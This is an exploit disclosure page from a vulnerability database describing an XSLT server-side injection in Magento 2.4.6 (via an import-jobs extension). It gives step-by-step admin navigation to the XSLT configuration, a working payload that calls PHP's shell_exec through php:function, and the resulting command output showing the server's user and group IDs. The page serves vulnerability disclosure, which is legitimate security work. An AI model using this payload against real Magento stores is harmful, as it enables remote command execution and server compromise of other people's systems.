Magento 2.4.6 XSLT Server Side Injection / Command Execution

2023.11.23
gb tmrswrr (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection # Date: 2023-11-17 # Exploit Author: tmrswrr # Vendor Homepage: https://magento2demo.firebearstudio.com/ # Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip # Version: 2.4.6 # Tested on: 2.4.6 POC: 1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/ 2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit 3 ) Click XSLT Configuration and write this payload : <?xml version="1.0" encoding="utf-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" > <xsl:template match="/"> <xsl:value-of select="php:function('shell_exec','id')" /> </xsl:template> </xsl:stylesheet> 4 ) Click Test XSL Template , You will be see "id" command result : <?xml version="1.0"?> uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

References:

https://packetstormsecurity.com/files/175793/Magento-2.4.6-XSLT-Server-Side-Injection-Command-Execution.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top